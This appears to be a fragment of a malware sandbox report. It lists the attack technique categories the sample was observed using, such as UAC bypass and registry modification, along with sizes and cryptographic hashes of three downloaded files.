Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55cff626de13c91fbaab65998e4f66369
SHA1ae92ee042c33af032431a92e4fc0b25ab05513b1
SHA2569160e0a74c9df215ca0f2cc18e16b93e866a8acc0490647636b35adda2f9c3bb
SHA5127fc150e684f99cc5dc02b9c11ad226453bab91c108a3c559777e66095e05a904556f59be2c2e1c06b73ba46f21ee21ebd995c0baecac57360e0e0105989331f0
-
Filesize
12KB
MD5877b337f24e833a02184ea1e6bceff7e
SHA1dc981d162f386da357c7d48b202d33e9cbcdd6bb
SHA256d211d9e96675a0a47935b75950054a2bdd529f9495d18b200b0a390970c7a56f
SHA512743104e639816a6fbdc0cc7ae5df1abdc16bd3dfc4e4158e1869ffe7c79791638da88ec45c6dfe6802a04416ef1410004961a98048a5eb6d77e871e432937378
-
Filesize
684B
MD5bb2463997b746ad881d0448bdc44ea2f
SHA18213cfdc7ed26a2932e6a7ae32c3ab10a5adf8a7
SHA25636a8c753312c37aec7d0c4cb5763d01f0d13f97fdf0dda21c30a899ec6b1cf6d
SHA512669ffca8935bab03769905bdb02032be40bba1dc7900d90bfcc8d09e16760ea567c9f6e16646c934cfb7417da95a3f880d2333432b1d304d2dc29f5782c959f9